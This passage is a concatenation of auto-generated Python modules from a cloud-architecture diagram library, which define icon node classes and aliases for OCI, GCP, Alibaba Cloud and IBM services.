InternetGatewayWhite(_Network): _icon = "internet-gateway-white.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class LoadBalancerWhite(_Network): _icon = "load-balancer-white.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class RouteTableWhite(_Network): _icon = "route-table-white.png" class RouteTable(_Network): _icon = "route-table.png" class SecurityListsWhite(_Network): _icon = "security-lists-white.png" class SecurityLists(_Network): _icon = "security-lists.png" class ServiceGatewayWhite(_Network): _icon = "service-gateway-white.png" class ServiceGateway(_Network): _icon = "service-gateway.png" class VcnWhite(_Network): _icon = "vcn-white.png" class Vcn(_Network): _icon = "vcn.png" # Aliases File: diagrams/oci/governance.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Governance(_OCI): _type = "governance" _icon_dir = "resources/oci/governance" class AuditWhite(_Governance): _icon = "audit-white.png" class Audit(_Governance): _icon = "audit.png" class CompartmentsWhite(_Governance): _icon = "compartments-white.png" class Compartments(_Governance): _icon = "compartments.png" class GroupsWhite(_Governance): _icon = "groups-white.png" class Groups(_Governance): _icon = "groups.png" class LoggingWhite(_Governance): _icon = "logging-white.png" class Logging(_Governance): _icon = "logging.png" class OCIDWhite(_Governance): _icon = "ocid-white.png" class OCID(_Governance): _icon = "ocid.png" class PoliciesWhite(_Governance): _icon = "policies-white.png" class Policies(_Governance): _icon = "policies.png" class TaggingWhite(_Governance): _icon = "tagging-white.png" class Tagging(_Governance): _icon = "tagging.png" # Aliases File: diagrams/oci/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OCI class _Compute(_OCI): _type = "compute" _icon_dir = "resources/oci/compute" class AutoscaleWhite(_Compute): _icon = "autoscale-white.png" class Autoscale(_Compute): _icon = "autoscale.png" class BMWhite(_Compute): _icon = "bm-white.png" class BM(_Compute): _icon = "bm.png" class ContainerWhite(_Compute): _icon = "container-white.png" class Container(_Compute): _icon = "container.png" class FunctionsWhite(_Compute): _icon = "functions-white.png" class Functions(_Compute): _icon = "functions.png" class InstancePoolsWhite(_Compute): _icon = "instance-pools-white.png" class InstancePools(_Compute): _icon = "instance-pools.png" class OCIRWhite(_Compute): _icon = "ocir-white.png" class OCIR(_Compute): _icon = "ocir.png" class OKEWhite(_Compute): _icon = "oke-white.png" class OKE(_Compute): _icon = "oke.png" class VMWhite(_Compute): _icon = "vm-white.png" class VM(_Compute): _icon = "vm.png" # Aliases VirtualMachine = VM VirtualMachineWhite = VMWhite BareMetal = BM BareMetalWhite = BMWhite OCIRegistry = OCIR OCIRegistryWhite = OCIRWhite ContainerEngine = OKE ContainerEngineWhite = OKEWhite File: diagrams/gcp/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Database(_GCP): _type = "database" _icon_dir = "resources/gcp/database" class Bigtable(_Database): _icon = "bigtable.png" class Datastore(_Database): _icon = "datastore.png" class Firestore(_Database): _icon = "firestore.png" class Memorystore(_Database): _icon = "memorystore.png" class Spanner(_Database): _icon = "spanner.png" class SQL(_Database): _icon = "sql.png" # Aliases BigTable = Bigtable File: diagrams/gcp/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Security(_GCP): _type = "security" _icon_dir = "resources/gcp/security" class Iam(_Security): _icon = "iam.png" class IAP(_Security): _icon = "iap.png" class KeyManagementService(_Security): _icon = "key-management-service.png" class ResourceManager(_Security): _icon = "resource-manager.png" class SecurityCommandCenter(_Security): _icon = "security-command-center.png" class SecurityScanner(_Security): _icon = "security-scanner.png" # Aliases KMS = KeyManagementService SCC = SecurityCommandCenter File: diagrams/gcp/__init__.py """ GCP provides a set of services for Google Cloud Platform provider. """ from diagrams import Node class _GCP(Node): _provider = "gcp" _icon_dir = "resources/gcp" fontcolor = "#2d3436" File: diagrams/gcp/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _GCP class _ML(_GCP): _type = "ml" _icon_dir = "resources/gcp/ml" class AdvancedSolutionsLab(_ML): _icon = "advanced-solutions-lab.png" class AIHub(_ML): _icon = "ai-hub.png" class AIPlatformDataLabelingService(_ML): _icon = "ai-platform-data-labeling-service.png" class AIPlatform(_ML): _icon = "ai-platform.png" class AutomlNaturalLanguage(_ML): _icon = "automl-natural-language.png" class AutomlTables(_ML): _icon = "automl-tables.png" class AutomlTranslation(_ML): _icon = "automl-translation.png" class AutomlVideoIntelligence(_ML): _icon = "automl-video-intelligence.png" class AutomlVision(_ML): _icon = "automl-vision.png" class Automl(_ML): _icon = "automl.png" class DialogFlowEnterpriseEdition(_ML): _icon = "dialog-flow-enterprise-edition.png" class InferenceAPI(_ML): _icon = "inference-api.png" class JobsAPI(_ML): _icon = "jobs-api.png" class NaturalLanguageAPI(_ML): _icon = "natural-language-api.png" class RecommendationsAI(_ML): _icon = "recommendations-ai.png" class SpeechToText(_ML): _icon = "speech-to-text.png" class TextToSpeech(_ML): _icon = "text-to-speech.png" class TPU(_ML): _icon = "tpu.png" class TranslationAPI(_ML): _icon = "translation-api.png" class VideoIntelligenceAPI(_ML): _icon = "video-intelligence-api.png" class VisionAPI(_ML): _icon = "vision-api.png" # Aliases AutoML = Automl NLAPI = NaturalLanguageAPI STT = SpeechToText TTS = TextToSpeech File: diagrams/gcp/api.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _API(_GCP): _type = "api" _icon_dir = "resources/gcp/api" class APIGateway(_API): _icon = "api-gateway.png" class Apigee(_API): _icon = "apigee.png" class Endpoints(_API): _icon = "endpoints.png" # Aliases File: diagrams/gcp/operations.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Operations(_GCP): _type = "operations" _icon_dir = "resources/gcp/operations" class Logging(_Operations): _icon = "logging.png" class Monitoring(_Operations): _icon = "monitoring.png" # Aliases File: diagrams/gcp/devtools.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Devtools(_GCP): _type = "devtools" _icon_dir = "resources/gcp/devtools" class Build(_Devtools): _icon = "build.png" class CodeForIntellij(_Devtools): _icon = "code-for-intellij.png" class Code(_Devtools): _icon = "code.png" class ContainerRegistry(_Devtools): _icon = "container-registry.png" class GradleAppEnginePlugin(_Devtools): _icon = "gradle-app-engine-plugin.png" class IdePlugins(_Devtools): _icon = "ide-plugins.png" class MavenAppEnginePlugin(_Devtools): _icon = "maven-app-engine-plugin.png" class Scheduler(_Devtools): _icon = "scheduler.png" class SDK(_Devtools): _icon = "sdk.png" class SourceRepositories(_Devtools): _icon = "source-repositories.png" class Tasks(_Devtools): _icon = "tasks.png" class TestLab(_Devtools): _icon = "test-lab.png" class ToolsForEclipse(_Devtools): _icon = "tools-for-eclipse.png" class ToolsForPowershell(_Devtools): _icon = "tools-for-powershell.png" class ToolsForVisualStudio(_Devtools): _icon = "tools-for-visual-studio.png" # Aliases GCR = ContainerRegistry File: diagrams/gcp/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
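# --- Illustrative sketch: GCP API, ML and devtools nodes above, assuming the
# top-level `diagrams.Diagram` API; labels are invented.
from diagrams import Diagram
from diagrams.gcp.api import APIGateway
from diagrams.gcp.devtools import GCR, Build
from diagrams.gcp.ml import AIPlatform

with Diagram("gcp_sketch", show=False):
    Build("cloud build") >> GCR("container registry")
    APIGateway("api") >> AIPlatform("prediction")
# --- end sketch ---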
import _GCP class _Storage(_GCP): _type = "storage" _icon_dir = "resources/gcp/storage" class Filestore(_Storage): _icon = "filestore.png" class PersistentDisk(_Storage): _icon = "persistent-disk.png" class Storage(_Storage): _icon = "storage.png" # Aliases GCS = Storage File: diagrams/gcp/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Network(_GCP): _type = "network" _icon_dir = "resources/gcp/network" class Armor(_Network): _icon = "armor.png" class CDN(_Network): _icon = "cdn.png" class DedicatedInterconnect(_Network): _icon = "dedicated-interconnect.png" class DNS(_Network): _icon = "dns.png" class ExternalIpAddresses(_Network): _icon = "external-ip-addresses.png" class FirewallRules(_Network): _icon = "firewall-rules.png" class LoadBalancing(_Network): _icon = "load-balancing.png" class NAT(_Network): _icon = "nat.png" class Network(_Network): _icon = "network.png" class PartnerInterconnect(_Network): _icon = "partner-interconnect.png" class PremiumNetworkTier(_Network): _icon = "premium-network-tier.png" class Router(_Network): _icon = "router.png" class Routes(_Network): _icon = "routes.png" class StandardNetworkTier(_Network): _icon = "standard-network-tier.png" class TrafficDirector(_Network): _icon = "traffic-director.png" class VirtualPrivateCloud(_Network): _icon = "virtual-private-cloud.png" class VPN(_Network): _icon = "vpn.png" # Aliases VPC = VirtualPrivateCloud File: diagrams/gcp/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Analytics(_GCP): _type = "analytics" _icon_dir = "resources/gcp/analytics" class Bigquery(_Analytics): _icon = "bigquery.png" class Composer(_Analytics): _icon = "composer.png" class DataCatalog(_Analytics): _icon = "data-catalog.png" class DataFusion(_Analytics): _icon = "data-fusion.png" class Dataflow(_Analytics): _icon = "dataflow.png" class Datalab(_Analytics): _icon = "datalab.png" class Dataprep(_Analytics): _icon = "dataprep.png" class Dataproc(_Analytics): _icon = "dataproc.png" class Genomics(_Analytics): _icon = "genomics.png" class Pubsub(_Analytics): _icon = "pubsub.png" # Aliases BigQuery = Bigquery PubSub = Pubsub File: diagrams/gcp/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Migration(_GCP): _type = "migration" _icon_dir = "resources/gcp/migration" class TransferAppliance(_Migration): _icon = "transfer-appliance.png" # Aliases File: diagrams/gcp/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Iot(_GCP): _type = "iot" _icon_dir = "resources/gcp/iot" class IotCore(_Iot): _icon = "iot-core.png" # Aliases File: diagrams/gcp/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Compute(_GCP): _type = "compute" _icon_dir = "resources/gcp/compute" class AppEngine(_Compute): _icon = "app-engine.png" class ComputeEngine(_Compute): _icon = "compute-engine.png" class ContainerOptimizedOS(_Compute): _icon = "container-optimized-os.png" class Functions(_Compute): _icon = "functions.png" class GKEOnPrem(_Compute): _icon = "gke-on-prem.png" class GPU(_Compute): _icon = "gpu.png" class KubernetesEngine(_Compute): _icon = "kubernetes-engine.png" class Run(_Compute): _icon = "run.png" # Aliases GAE = AppEngine GCF = Functions GCE = ComputeEngine GKE = KubernetesEngine File: diagrams/alibabacloud/web.py # This module is automatically generated by autogen.sh. 
DO NOT EDIT.
from . import _AlibabaCloud

class _Web(_AlibabaCloud):
    _type = "web"
    _icon_dir = "resources/alibabacloud/web"

class Dns(_Web): _icon = "dns.png"
class Domain(_Web): _icon = "domain.png"

# Aliases

File: diagrams/alibabacloud/database.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _AlibabaCloud

class _Database(_AlibabaCloud):
    _type = "database"
    _icon_dir = "resources/alibabacloud/database"

class ApsaradbCassandra(_Database): _icon = "apsaradb-cassandra.png"
class ApsaradbHbase(_Database): _icon = "apsaradb-hbase.png"
class ApsaradbMemcache(_Database): _icon = "apsaradb-memcache.png"
class ApsaradbMongodb(_Database): _icon = "apsaradb-mongodb.png"
class ApsaradbOceanbase(_Database): _icon = "apsaradb-oceanbase.png"
class ApsaradbPolardb(_Database): _icon = "apsaradb-polardb.png"
class ApsaradbPostgresql(_Database): _icon = "apsaradb-postgresql.png"
class ApsaradbPpas(_Database): _icon = "apsaradb-ppas.png"
class ApsaradbRedis(_Database): _icon = "apsaradb-redis.png"
class ApsaradbSqlserver(_Database): _icon = "apsaradb-sqlserver.png"
class DataManagementService(_Database): _icon = "data-management-service.png"
class DataTransmissionService(_Database): _icon = "data-transmission-service.png"
class DatabaseBackupService(_Database): _icon = "database-backup-service.png"
class DisributeRelationalDatabaseService(_Database): _icon = "disribute-relational-database-service.png"
class GraphDatabaseService(_Database): _icon = "graph-database-service.png"
class HybriddbForMysql(_Database): _icon = "hybriddb-for-mysql.png"
class RelationalDatabaseService(_Database): _icon = "relational-database-service.png"

# Aliases
DMS = DataManagementService
DTS = DataTransmissionService
DBS = DatabaseBackupService
DRDS = DisributeRelationalDatabaseService
GDS = GraphDatabaseService
RDS = RelationalDatabaseService

File: diagrams/alibabacloud/security.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.
from .
import _AlibabaCloud class _Security(_AlibabaCloud): _type = "security" _icon_dir = "resources/alibabacloud/security" class AntiBotService(_Security): _icon = "anti-bot-service.png" class AntiDdosBasic(_Security): _icon = "anti-ddos-basic.png" class AntiDdosPro(_Security): _icon = "anti-ddos-pro.png" class AntifraudService(_Security): _icon = "antifraud-service.png" class BastionHost(_Security): _icon = "bastion-host.png" class CloudFirewall(_Security): _icon = "cloud-firewall.png" class CloudSecurityScanner(_Security): _icon = "cloud-security-scanner.png" class ContentModeration(_Security): _icon = "content-moderation.png" class CrowdsourcedSecurityTesting(_Security): _icon = "crowdsourced-security-testing.png" class DataEncryptionService(_Security): _icon = "data-encryption-service.png" class DbAudit(_Security): _icon = "db-audit.png" class GameShield(_Security): _icon = "game-shield.png" class IdVerification(_Security): _icon = "id-verification.png" class ManagedSecurityService(_Security): _icon = "managed-security-service.png" class SecurityCenter(_Security): _icon = "security-center.png" class ServerGuard(_Security): _icon = "server-guard.png" class SslCertificates(_Security): _icon = "ssl-certificates.png" class WebApplicationFirewall(_Security): _icon = "web-application-firewall.png" # Aliases ABS = AntiBotService AS = AntifraudService CFW = CloudFirewall CM = ContentModeration DES = DataEncryptionService WAF = WebApplicationFirewall File: diagrams/alibabacloud/__init__.py """ AlibabaCloud provides a set of services for Alibaba Cloud provider. """ from diagrams import Node class _AlibabaCloud(Node): _provider = "alibabacloud" _icon_dir = "resources/alibabacloud" fontcolor = "#ffffff" File: diagrams/alibabacloud/application.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Application(_AlibabaCloud): _type = "application" _icon_dir = "resources/alibabacloud/application" class ApiGateway(_Application): _icon = "api-gateway.png" class BeeBot(_Application): _icon = "bee-bot.png" class BlockchainAsAService(_Application): _icon = "blockchain-as-a-service.png" class CloudCallCenter(_Application): _icon = "cloud-call-center.png" class CodePipeline(_Application): _icon = "code-pipeline.png" class DirectMail(_Application): _icon = "direct-mail.png" class LogService(_Application): _icon = "log-service.png" class MessageNotificationService(_Application): _icon = "message-notification-service.png" class NodeJsPerformancePlatform(_Application): _icon = "node-js-performance-platform.png" class OpenSearch(_Application): _icon = "open-search.png" class PerformanceTestingService(_Application): _icon = "performance-testing-service.png" class RdCloud(_Application): _icon = "rd-cloud.png" class SmartConversationAnalysis(_Application): _icon = "smart-conversation-analysis.png" class Yida(_Application): _icon = "yida.png" # Aliases SLS = LogService MNS = MessageNotificationService PTS = PerformanceTestingService SCA = SmartConversationAnalysis File: diagrams/alibabacloud/communication.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Communication(_AlibabaCloud): _type = "communication" _icon_dir = "resources/alibabacloud/communication" class DirectMail(_Communication): _icon = "direct-mail.png" class MobilePush(_Communication): _icon = "mobile-push.png" # Aliases File: diagrams/alibabacloud/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _AlibabaCloud class _Storage(_AlibabaCloud): _type = "storage" _icon_dir = "resources/alibabacloud/storage" class CloudStorageGateway(_Storage): _icon = "cloud-storage-gateway.png" class FileStorageHdfs(_Storage): _icon = "file-storage-hdfs.png" class FileStorageNas(_Storage): _icon = "file-storage-nas.png" class HybridBackupRecovery(_Storage): _icon = "hybrid-backup-recovery.png" class HybridCloudDisasterRecovery(_Storage): _icon = "hybrid-cloud-disaster-recovery.png" class Imm(_Storage): _icon = "imm.png" class ObjectStorageService(_Storage): _icon = "object-storage-service.png" class ObjectTableStore(_Storage): _icon = "object-table-store.png" # Aliases HDFS = FileStorageHdfs NAS = FileStorageNas HBR = HybridBackupRecovery HDR = HybridCloudDisasterRecovery OSS = ObjectStorageService OTS = ObjectTableStore File: diagrams/alibabacloud/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Network(_AlibabaCloud): _type = "network" _icon_dir = "resources/alibabacloud/network" class Cdn(_Network): _icon = "cdn.png" class CloudEnterpriseNetwork(_Network): _icon = "cloud-enterprise-network.png" class ElasticIpAddress(_Network): _icon = "elastic-ip-address.png" class ExpressConnect(_Network): _icon = "express-connect.png" class NatGateway(_Network): _icon = "nat-gateway.png" class ServerLoadBalancer(_Network): _icon = "server-load-balancer.png" class SmartAccessGateway(_Network): _icon = "smart-access-gateway.png" class VirtualPrivateCloud(_Network): _icon = "virtual-private-cloud.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" # Aliases CEN = CloudEnterpriseNetwork EIP = ElasticIpAddress SLB = ServerLoadBalancer VPC = VirtualPrivateCloud File: diagrams/alibabacloud/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Analytics(_AlibabaCloud): _type = "analytics" _icon_dir = "resources/alibabacloud/analytics" class AnalyticDb(_Analytics): _icon = "analytic-db.png" class ClickHouse(_Analytics): _icon = "click-house.png" class DataLakeAnalytics(_Analytics): _icon = "data-lake-analytics.png" class ElaticMapReduce(_Analytics): _icon = "elatic-map-reduce.png" class OpenSearch(_Analytics): _icon = "open-search.png" # Aliases File: diagrams/alibabacloud/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Iot(_AlibabaCloud): _type = "iot" _icon_dir = "resources/alibabacloud/iot" class IotInternetDeviceId(_Iot): _icon = "iot-internet-device-id.png" class IotLinkWan(_Iot): _icon = "iot-link-wan.png" class IotMobileConnectionPackage(_Iot): _icon = "iot-mobile-connection-package.png" class IotPlatform(_Iot): _icon = "iot-platform.png" # Aliases File: diagrams/alibabacloud/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
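# --- Illustrative sketch: Alibaba Cloud network, storage and database aliases
# above (SLB, OSS, RDS), plus ECS from the compute module listed just below;
# assumes `diagrams.Diagram`, labels are made up.
from diagrams import Diagram
from diagrams.alibabacloud.compute import ECS
from diagrams.alibabacloud.database import RDS
from diagrams.alibabacloud.network import SLB
from diagrams.alibabacloud.storage import OSS

with Diagram("alibabacloud_sketch", show=False):
    app = ECS("ecs instance")
    SLB("server load balancer") >> app >> RDS("rds")
    app >> OSS("object storage")
# --- end sketch ---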
import _AlibabaCloud class _Compute(_AlibabaCloud): _type = "compute" _icon_dir = "resources/alibabacloud/compute" class AutoScaling(_Compute): _icon = "auto-scaling.png" class BatchCompute(_Compute): _icon = "batch-compute.png" class ContainerRegistry(_Compute): _icon = "container-registry.png" class ContainerService(_Compute): _icon = "container-service.png" class ElasticComputeService(_Compute): _icon = "elastic-compute-service.png" class ElasticContainerInstance(_Compute): _icon = "elastic-container-instance.png" class ElasticHighPerformanceComputing(_Compute): _icon = "elastic-high-performance-computing.png" class ElasticSearch(_Compute): _icon = "elastic-search.png" class FunctionCompute(_Compute): _icon = "function-compute.png" class OperationOrchestrationService(_Compute): _icon = "operation-orchestration-service.png" class ResourceOrchestrationService(_Compute): _icon = "resource-orchestration-service.png" class ServerLoadBalancer(_Compute): _icon = "server-load-balancer.png" class ServerlessAppEngine(_Compute): _icon = "serverless-app-engine.png" class SimpleApplicationServer(_Compute): _icon = "simple-application-server.png" class WebAppService(_Compute): _icon = "web-app-service.png" # Aliases ESS = AutoScaling ECS = ElasticComputeService ECI = ElasticContainerInstance EHPC = ElasticHighPerformanceComputing FC = FunctionCompute OOS = OperationOrchestrationService ROS = ResourceOrchestrationService SLB = ServerLoadBalancer SAE = ServerlessAppEngine SAS = SimpleApplicationServer WAS = WebAppService File: diagrams/ibm/user.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _User(_IBM): _type = "user" _icon_dir = "resources/ibm/user" class Browser(_User): _icon = "browser.png" class Device(_User): _icon = "device.png" class IntegratedDigitalExperiences(_User): _icon = "integrated-digital-experiences.png" class PhysicalEntity(_User): _icon = "physical-entity.png" class Sensor(_User): _icon = "sensor.png" class User(_User): _icon = "user.png" # Aliases File: diagrams/ibm/social.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Social(_IBM): _type = "social" _icon_dir = "resources/ibm/social" class Communities(_Social): _icon = "communities.png" class FileSync(_Social): _icon = "file-sync.png" class LiveCollaboration(_Social): _icon = "live-collaboration.png" class Messaging(_Social): _icon = "messaging.png" class Networking(_Social): _icon = "networking.png" # Aliases File: diagrams/ibm/infrastructure.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _IBM class _Infrastructure(_IBM): _type = "infrastructure" _icon_dir = "resources/ibm/infrastructure" class Channels(_Infrastructure): _icon = "channels.png" class CloudMessaging(_Infrastructure): _icon = "cloud-messaging.png" class Dashboard(_Infrastructure): _icon = "dashboard.png" class Diagnostics(_Infrastructure): _icon = "diagnostics.png" class EdgeServices(_Infrastructure): _icon = "edge-services.png" class EnterpriseMessaging(_Infrastructure): _icon = "enterprise-messaging.png" class EventFeed(_Infrastructure): _icon = "event-feed.png" class InfrastructureServices(_Infrastructure): _icon = "infrastructure-services.png" class InterserviceCommunication(_Infrastructure): _icon = "interservice-communication.png" class LoadBalancingRouting(_Infrastructure): _icon = "load-balancing-routing.png" class MicroservicesMesh(_Infrastructure): _icon = "microservices-mesh.png" class MobileBackend(_Infrastructure): _icon = "mobile-backend.png" class MobileProviderNetwork(_Infrastructure): _icon = "mobile-provider-network.png" class MonitoringLogging(_Infrastructure): _icon = "monitoring-logging.png" class Monitoring(_Infrastructure): _icon = "monitoring.png" class PeerServices(_Infrastructure): _icon = "peer-services.png" class ServiceDiscoveryConfiguration(_Infrastructure): _icon = "service-discovery-configuration.png" class TransformationConnectivity(_Infrastructure): _icon = "transformation-connectivity.png" # Aliases File: diagrams/ibm/applications.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Applications(_IBM): _type = "applications" _icon_dir = "resources/ibm/applications" class ActionableInsight(_Applications): _icon = "actionable-insight.png" class Annotate(_Applications): _icon = "annotate.png" class ApiDeveloperPortal(_Applications): _icon = "api-developer-portal.png" class ApiPolyglotRuntimes(_Applications): _icon = "api-polyglot-runtimes.png" class AppServer(_Applications): _icon = "app-server.png" class ApplicationLogic(_Applications): _icon = "application-logic.png" class EnterpriseApplications(_Applications): _icon = "enterprise-applications.png" class Index(_Applications): _icon = "index.png" class IotApplication(_Applications): _icon = "iot-application.png" class Microservice(_Applications): _icon = "microservice.png" class MobileApp(_Applications): _icon = "mobile-app.png" class Ontology(_Applications): _icon = "ontology.png" class OpenSourceTools(_Applications): _icon = "open-source-tools.png" class RuntimeServices(_Applications): _icon = "runtime-services.png" class SaasApplications(_Applications): _icon = "saas-applications.png" class ServiceBroker(_Applications): _icon = "service-broker.png" class SpeechToText(_Applications): _icon = "speech-to-text.png" class VisualRecognition(_Applications): _icon = "visual-recognition.png" class Visualization(_Applications): _icon = "visualization.png" # Aliases File: diagrams/ibm/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _IBM class _Security(_IBM): _type = "security" _icon_dir = "resources/ibm/security" class ApiSecurity(_Security): _icon = "api-security.png" class BlockchainSecurityService(_Security): _icon = "blockchain-security-service.png" class DataSecurity(_Security): _icon = "data-security.png" class Firewall(_Security): _icon = "firewall.png" class Gateway(_Security): _icon = "gateway.png" class GovernanceRiskCompliance(_Security): _icon = "governance-risk-compliance.png" class IdentityAccessManagement(_Security): _icon = "identity-access-management.png" class IdentityProvider(_Security): _icon = "identity-provider.png" class InfrastructureSecurity(_Security): _icon = "infrastructure-security.png" class PhysicalSecurity(_Security): _icon = "physical-security.png" class SecurityMonitoringIntelligence(_Security): _icon = "security-monitoring-intelligence.png" class SecurityServices(_Security): _icon = "security-services.png" class TrustendComputing(_Security): _icon = "trustend-computing.png" class Vpn(_Security): _icon = "vpn.png" # Aliases File: diagrams/ibm/__init__.py """ IBM provides a set of services for IBM Cloud provider. """ from diagrams import Node class _IBM(Node): _provider = "ibm" _icon_dir = "resources/ibm" fontcolor = "#ffffff" File: diagrams/ibm/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Devops(_IBM): _type = "devops" _icon_dir = "resources/ibm/devops" class ArtifactManagement(_Devops): _icon = "artifact-management.png" class BuildTest(_Devops): _icon = "build-test.png" class CodeEditor(_Devops): _icon = "code-editor.png" class CollaborativeDevelopment(_Devops): _icon = "collaborative-development.png" class ConfigurationManagement(_Devops): _icon = "configuration-management.png" class ContinuousDeploy(_Devops): _icon = "continuous-deploy.png" class ContinuousTesting(_Devops): _icon = "continuous-testing.png" class Devops(_Devops): _icon = "devops.png" class Provision(_Devops): _icon = "provision.png" class ReleaseManagement(_Devops): _icon = "release-management.png" # Aliases File: diagrams/ibm/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Storage(_IBM): _type = "storage" _icon_dir = "resources/ibm/storage" class BlockStorage(_Storage): _icon = "block-storage.png" class ObjectStorage(_Storage): _icon = "object-storage.png" # Aliases File: diagrams/ibm/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _IBM class _Network(_IBM): _type = "network" _icon_dir = "resources/ibm/network" class Bridge(_Network): _icon = "bridge.png" class DirectLink(_Network): _icon = "direct-link.png" class Enterprise(_Network): _icon = "enterprise.png" class Firewall(_Network): _icon = "firewall.png" class FloatingIp(_Network): _icon = "floating-ip.png" class Gateway(_Network): _icon = "gateway.png" class InternetServices(_Network): _icon = "internet-services.png" class LoadBalancerListener(_Network): _icon = "load-balancer-listener.png" class LoadBalancerPool(_Network): _icon = "load-balancer-pool.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class LoadBalancingRouting(_Network): _icon = "load-balancing-routing.png" class PublicGateway(_Network): _icon = "public-gateway.png" class Region(_Network): _icon = "region.png" class Router(_Network): _icon = "router.png" class Rules(_Network): _icon = "rules.png" class Subnet(_Network): _icon = "subnet.png" class TransitGateway(_Network): _icon = "transit-gateway.png" class Vpc(_Network): _icon = "vpc.png" class VpnConnection(_Network): _icon = "vpn-connection.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" class VpnPolicy(_Network): _icon = "vpn-policy.png" # Aliases File: diagrams/ibm/management.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Management(_IBM): _type = "management" _icon_dir = "resources/ibm/management" class AlertNotification(_Management): _icon = "alert-notification.png" class ApiManagement(_Management): _icon = "api-management.png" class CloudManagement(_Management): _icon = "cloud-management.png" class ClusterManagement(_Management): _icon = "cluster-management.png" class ContentManagement(_Management): _icon = "content-management.png" class DataServices(_Management): _icon = "data-services.png" class DeviceManagement(_Management): _icon = "device-management.png" class InformationGovernance(_Management): _icon = "information-governance.png" class ItServiceManagement(_Management): _icon = "it-service-management.png" class Management(_Management): _icon = "management.png" class MonitoringMetrics(_Management): _icon = "monitoring-metrics.png" class ProcessManagement(_Management): _icon = "process-management.png" class ProviderCloudPortalService(_Management): _icon = "provider-cloud-portal-service.png" class PushNotifications(_Management): _icon = "push-notifications.png" class ServiceManagementTools(_Management): _icon = "service-management-tools.png" # Aliases File: diagrams/ibm/blockchain.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _IBM class _Blockchain(_IBM): _type = "blockchain" _icon_dir = "resources/ibm/blockchain" class BlockchainDeveloper(_Blockchain): _icon = "blockchain-developer.png" class Blockchain(_Blockchain): _icon = "blockchain.png" class CertificateAuthority(_Blockchain): _icon = "certificate-authority.png" class ClientApplication(_Blockchain): _icon = "client-application.png" class Communication(_Blockchain): _icon = "communication.png" class Consensus(_Blockchain): _icon = "consensus.png" class EventListener(_Blockchain): _icon = "event-listener.png" class Event(_Blockchain): _icon = "event.png" class ExistingEnterpriseSystems(_Blockchain): _icon = "existing-enterprise-systems.png" class HyperledgerFabric(_Blockchain): _icon = "hyperledger-fabric.png" class KeyManagement(_Blockchain): _icon = "key-management.png" class Ledger(_Blockchain): _icon = "ledger.png" class MembershipServicesProviderApi(_Blockchain): _icon = "membership-services-provider-api.png" class Membership(_Blockchain): _icon = "membership.png" class MessageBus(_Blockchain): _icon = "message-bus.png" class Node(_Blockchain): _icon = "node.png" class Services(_Blockchain): _icon = "services.png" class SmartContract(_Blockchain): _icon = "smart-contract.png" class TransactionManager(_Blockchain): _icon = "transaction-manager.png" class Wallet(_Blockchain): _icon = "wallet.png" # Aliases File: diagrams/ibm/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Analytics(_IBM): _type = "analytics" _icon_dir = "resources/ibm/analytics" class Analytics(_Analytics): _icon = "analytics.png" class DataIntegration(_Analytics): _icon = "data-integration.png" class DataRepositories(_Analytics): _icon = "data-repositories.png" class DeviceAnalytics(_Analytics): _icon = "device-analytics.png" class StreamingComputing(_Analytics): _icon = "streaming-computing.png" # Aliases File: diagrams/ibm/data.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Data(_IBM): _type = "data" _icon_dir = "resources/ibm/data" class Caches(_Data): _icon = "caches.png" class Cloud(_Data): _icon = "cloud.png" class ConversationTrainedDeployed(_Data): _icon = "conversation-trained-deployed.png" class DataServices(_Data): _icon = "data-services.png" class DataSources(_Data): _icon = "data-sources.png" class DeviceIdentityService(_Data): _icon = "device-identity-service.png" class DeviceRegistry(_Data): _icon = "device-registry.png" class EnterpriseData(_Data): _icon = "enterprise-data.png" class EnterpriseUserDirectory(_Data): _icon = "enterprise-user-directory.png" class FileRepository(_Data): _icon = "file-repository.png" class GroundTruth(_Data): _icon = "ground-truth.png" class Model(_Data): _icon = "model.png" class 